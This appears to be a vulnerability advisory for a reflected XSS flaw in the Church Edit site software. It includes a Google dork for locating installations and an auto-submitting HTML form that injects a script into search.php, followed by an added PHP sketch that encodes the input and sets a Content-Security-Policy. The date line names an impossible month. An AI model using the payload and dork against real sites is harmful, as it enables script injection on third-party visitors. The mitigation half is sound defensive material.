######################
# Exploit Title : Church Edit XSS Vulnerability
# Exploit Author : Ashiyane Digital Security Team
# Vendor Homepage : http://www.churchedit.co.uk/
# Google Dork : "This church website is powered by Church Edit"
# Date: 2016-18-22
# Tested On : Windows 7 / Firefox
######################
# exploit:
# <form name="form1" method="post" action="http://[url]/search.php">
# <input type="hidden" name="searchterm" value='<script>alert(/xss/)</script>' />
# (the value attribute holds your JS code)
# </form>
# <script language="javascript">
# setTimeout('form1.submit()', 1);
# </script>
******************************
# Demos :
######################
# discovered by : Amir.ght
######################
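
Mitigation sketch, added here as an example and not taken from the advisory or from Church Edit's code: a hypothetical search.php handler that reflects the POSTed searchterm field only after context-appropriate HTML encoding, with a Content-Security-Policy header as a second layer. Only the file name and the searchterm parameter come from the advisory; the helper names h() and read_search_term(), the 100-byte limit and the page markup are assumptions.

```php
<?php
declare(strict_types=1);

// Hypothetical handler for the POSTed "searchterm" field named in the advisory.
// The vendor's source is not on the page; everything below is illustrative.

// Encode a value for an HTML text node or a quoted attribute.
// ENT_QUOTES covers both quote styles; ENT_SUBSTITUTE replaces invalid UTF-8
// (including a multi-byte character cut by substr) instead of returning ''.
function h(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

// Read the field as a bounded plain string. An array submitted as
// searchterm[]=x is rejected rather than passed on to string functions.
function read_search_term(array $post): string
{
    $raw = $post['searchterm'] ?? '';
    if (!is_string($raw)) {
        return '';
    }
    return substr(trim($raw), 0, 100); // assumed length limit
}

$term = read_search_term($_POST);

// Defence in depth: without 'unsafe-inline', an injected <script> element is
// not executed even if an encoding call is missed elsewhere in a template.
header("Content-Security-Policy: default-src 'self'; script-src 'self'");
header('Content-Type: text/html; charset=UTF-8');

// Assumed weak form (raw reflection of the parameter into the page):
//   echo '<p>Results for ' . $_POST['searchterm'] . '</p>';
// Hardened form: every reflection of the term passes through h().
?>
<!doctype html>
<title>Search</title>
<form method="post" action="search.php">
  <input type="text" name="searchterm" value="<?= h($term) ?>">
</form>
<p>Results for <?= h($term) ?></p>
```

With this handler the payload in the proof of concept is rendered as the literal text &lt;script&gt;alert(/xss/)&lt;/script&gt; in both the input value and the results line.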